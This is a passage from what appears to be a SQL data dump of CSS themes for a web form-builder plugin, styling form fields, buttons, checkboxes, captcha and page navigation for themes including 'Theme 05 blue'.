#fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 20px;\r\n	width: 22px;\r\n	background: url([SITE_ROOT]/images/04/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 45px;\r\n	height: 44px;\r\n	background: url([SITE_ROOT]/images/04/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #424242;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 35px;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-weight: 400;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n}\r\ndiv.wdform-page-button:hover {\r\ncolor: #fff;\r\nborder: 1px solid #919191;\r\nbackground: #7A7A7A ;\r\nbackground: -moz-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -webkit-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -o-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -ms-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: linear-gradient(to bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-submit {\r\n	color: #767676 !important;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 39px;\r\n	line-height: 32px;\r\n	padding: 0px 20px 5px;\r\n	vertical-align: middle;\r\n	font-weight: 400 !important;\r\n	font-size: 20px;\r\n	border: 1px solid #959595;\r\n	border-radius: 5px;\r\n	font-family: Segoe UI;\r\nbackground:transparent;\r\n}\r\n.button-submit:hover {\r\ncolor: #fff !important;\r\nborder: 1px solid #919191;\r\nbackground: #7A7A7A ;\r\nbackground: -moz-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -webkit-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -o-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: -ms-linear-gradient(bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbackground: linear-gradient(to bottom, #C7C7C7 0%, #A0A0A0 49%, #7A7A7A 84%, #858585 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(221, 221, 221) inset;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px 15px 15px 50px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/04/02/bg.png) no-repeat;\r\n	text-align: left;\r\n	border-radius: 0px;\r\n	width: 300px;\r\npadding: 5px;\r\n	text-align: center;\r\nfont-size: 16px;\r\n}\r\n.wdform_section_break\r\n{\r\nmargin: 16px 10px 16px 0px;\r\ntext-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 24px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ccc;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	border: 1px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	border-color: #B3B3B3;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/02/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/04/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 14px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 8px 1px rgb(213, 213, 213) inset;\r\n}\r\n.radio-div label {\r\ncursor: pointer;\r\n-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: \"\";\r\nposition: absolute;\r\nwidth: 10px;\r\nheight: 10px;\r\nbackground: #63929E ;\r\nbackground: -moz-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -webkit-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -o-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: -ms-linear-gradient(bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbackground: linear-gradient(to bottom, #84B8C5 0%, #75A1AC 49%, #63929E 84%, #377483 95%);\r\nbox-shadow: 0px 0px 5px 0px rgb(214, 214, 214) inset;\r\nborder-radius: 7px;\r\ntop: 1px;\r\nleft: 1px;\r\nborder: 1px solid #678B94;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.5;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 20px 0px 20px;\r\n	font-weight: bold;\r\n	background-color: #C0C0C0;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #A8A8A8;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-left: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #678B94;\r\n	vertical-align: middle;\r\n	font-family: ArTarumianHandes;\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #88B4BD;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 20px;\r\n	height: 23px;\r\n	background-color: #678B94;\r\n	position: relative;\r\n	left: -14px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n	-moz-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-webkit-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-o-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	-ms-transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n	transform: scale(1) rotate(0deg) translateX(0px) translateY(0px) skewX(-25deg) skewY(0deg);\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(17,'Theme 05 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #0E7297;\r\nborder: 1px solid #A0CBDB;\r\nmargin-bottom: 10px;\r\ncolor: #A0CBDB;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/01/nextbg_hover.png) url([SITE_ROOT]/images/05/01/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #00B4F6 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/01/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/01/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/01/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/01/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/01/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #A0CBDB;\r\n	padding:15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 0px;\r\n	background: #006A91;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: \" \";\r\n	position: relative;\r\n	width: 97.7%;\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\ncolor: #3F3F3F;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px 